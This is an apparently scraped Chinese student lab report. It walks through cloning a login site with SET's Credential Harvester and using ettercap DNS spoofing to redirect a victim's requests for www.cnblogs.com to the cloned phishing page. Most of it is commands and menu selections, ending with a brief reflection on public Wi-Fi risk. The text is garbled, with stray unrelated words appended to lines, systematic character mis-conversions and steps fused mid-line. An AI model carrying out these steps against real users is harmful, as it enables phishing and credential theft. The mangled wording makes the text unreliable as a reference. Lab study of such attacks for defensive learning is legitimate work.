(1)一般在什麼場景下容易受到DNS spoof攻擊。apache
(2)在平常生活工做中如何防範以上兩攻擊方法。緩存
簡單應用SET工具創建冒名網站網絡
ettercap DNS spoofapp
結合應用兩種技術,用DNS spoof引導特定訪問到冒名網站工具
請勿使用外部網站作實驗網站
netstat -tupln |grep 80
查看80端口是否被使用,若是被使用的話,則使用kill + PID
殺死進程sudo vi /etc/apache2/ports.conf
指令修改Apache的端口配置文件,將端口改成http對應的80號端口apachectl start
開啓Apache服務setoolkit
打開SET工具1
選擇 Social-Engineering Attacks(社會工程學攻擊)2
選擇 Website Attack Vectors(釣魚網站攻擊向量)3
Credential Harvester Attack Method(登陸密碼截取攻擊)2
Site Cloner(進行克隆網站)192.168.1.216
(攻擊者IP)mail.qq.com
(被克隆的url)http:192.168.1.216
進行網址縮短,在靶機winXP中訪問縮短後網址http://suo.im/55eObz
能夠看到訪問到克隆網站,ifconfig eth0 promisc
將kali改成混雜模式vi /etc/ettercap/etter.dns
對DNS緩存表進行修改
192.168.43.144
ettercap -G
開啓ettercap,選擇 Sniff -> unified sniffing ,在彈出的界面中選擇 eth0 -> ok,監聽eth0網卡注:個人kali沒法搜索出來其餘主機的IP,因此我又搞了一臺kali再次掃描的時候,就能夠掃描出來了。嘻嘻。url
192.168.43.1
(kali的網關)添加到target1,靶機IP192.168.43.21
(另外一臺kali的IP)添加到target2ping www.cnblogs.com
返回的數據中顯示的是kali的IP192.168.1.101
,克隆的網站輸入mosoteach.cn
(藍墨雲)完成第一步。ping www.cnblogs.com
返回的數據中顯示的是攻擊者kali的IP,訪問www.cnblogs.com
時跳轉到以前克隆的藍墨雲網站界面。本次實驗真的是頗有趣,同時也讓我明白原來被騙是如此容易,之後儘可能不要使用公共的wifi,畢竟也不知道連着相同wifi裏有沒有想搞事情的壞人。而後偷偷吐槽一下個人電腦,永遠有着謎通常的問題,讓我在實驗中感覺一點成功的快樂和無限處理bug的痛苦。spa